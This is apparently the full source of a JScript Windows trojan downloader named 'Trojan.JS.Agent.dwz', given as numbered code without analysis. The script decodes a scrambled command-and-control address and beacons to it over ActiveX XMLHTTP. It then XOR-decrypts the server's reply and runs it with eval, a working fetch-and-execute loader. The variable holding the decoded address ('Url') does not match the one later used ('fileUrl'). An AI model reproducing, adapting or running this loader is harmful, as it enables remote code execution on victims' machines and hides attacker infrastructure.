Trojan.JS.Agent.dwz

1. var key = [46, 2, 187, 236, 225, 77, 67, 200, 231, 250];
2.  
3. Url = getUrl('/fri4g:.:l3epx6ifpg/pm&o#c4.se/n0i5l.naoktbetl6l:a8p0l9l:i/p0s8.pc4i1t3a7t.s#');
4. var tid = getUrl('.7m0&5w');
5. var content1 = '';
6. var authHeader = 'Age';
7. var authKey = getRandHexStr(16);
8. fileUrl = 'http://' + getRandHexStr(8) + '.' + fileUrl;
9. function getRandHexStr(length) {
10. var text = '';
11. var possible = 'abcdef0123456789';
12. for (var i = 0; i < length; i++)
13. text += possible.charAt(Math.floor(Math.random() * possible.length));
14. return text;
15. }
16. function a2hex(str) {
17. var arr = [];
18. for (var i = 0, l = str.length; i < l; i++) {
19. var hex = '00' + Number(str.charCodeAt(i)).toString(16);
20. hex = hex.substr(hex.length - 2);
21. arr.push(hex);
22. }
23. return arr.join('');
24. }
25. function getUrl(url) {
26. var res = '';
27. url = url.split('');
28. for (var i = 0; i < url.length; i++) {
29. if (i % 2 === 1) {
30. res += url[i];
31. }
32. }
33. res = res.split('').reverse().join('');
34. return res;
35. }
36. function decodeContent1(str) {
37. var offset = 2;
38. var content1_length = parseInt(str.substr(offset + 0, 6), 16);
39. var content1_body = str.substr(offset + 6, content1_length * 2);
40. content1 = decPayload(content1_body);
41. }
42. function decPayload(str) {
43. var body;
44. var key;
45. var i;
46. var enc_str = [];
47. for (i = 0; i < str.length; i += 2) {
48. enc_str.push(parseInt(str.substr(i, 2), 16));
49. }
50. ;
51. body = enc_str.slice(enc_str[0] + 1);
52. key = enc_str.slice(1, enc_str[0] + 1);
53. for (i = 0; i < body.length; i++) {
54. body[i] = body[i] ^ key[i % key.length];
55. }
56. for (i = 0; i < body.length; i++) {
57. body[i] = String.fromCharCode(body[i]);
58. }
59. ;
60. return body.join('');
61. }
62. function encStr(str) {
63. var key = getRandomInt(0, 255);
64. var i;
65. str = str.split('');
66. for (i = 0; i < str.length; i++) {
67. str[i] = str[i].charCodeAt(0) ^ key;
68. }
69. ;
70. for (i = 0; i < str.length; i++) {
71. str[i] = String.fromCharCode(str[i]);
72. }
73. ;
74. var extra_char = getRandomInt(0, 255);
75. return a2hex(String.fromCharCode(extra_char) + String.fromCharCode(key) + str.join(''));
76. }
77. function getRandomInt(min, max) {
78. return Math.floor(Math.random() * (max - min + 1)) + min;
79. }
80. function initialRequest1() {
81. var req = [];
82. req.push(getRandHexStr(8));
83. req.push(tid);
84. req.push(+new Date());
85. var q = '';
86. try {
87. for (var i = 0; i < req.length; i++) {
88. q += i + '=' + encodeURIComponent('' + req[i]) + '&';
89. }
90. q = encStr(q);
91. } catch (error) {
92. }
93. var xmlHttp;
94. var attempts = 2;
95. var timeout = 3 * 1000;
96. for (var i = 0; i < attempts; i++) {
97. try {
98. xmlHttp = new ActiveXObject('MSXML2.XMLHTTP');
99. xmlHttp.open('POST', fileUrl, false);
100. xmlHttp.setRequestHeader(authHeader, authKey);
101. xmlHttp.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
102. xmlHttp.send('a=' + q);
103. if (xmlHttp.status == 200) {
104. return xmlHttp.responseText;
105. } else {
106. }
107. WScript.Sleep(timeout);
108. } catch (error) {
109. }
110. }
111. return false;
112. }
113. var data1 = initialRequest1();
114. if (data1 !== false && data1 != '0' && data1 != '') {
115. decodeContent1(data1);
116. eval(content1);
117. if (typeof step2 == 'function') {
118. step2();
119. }
120. }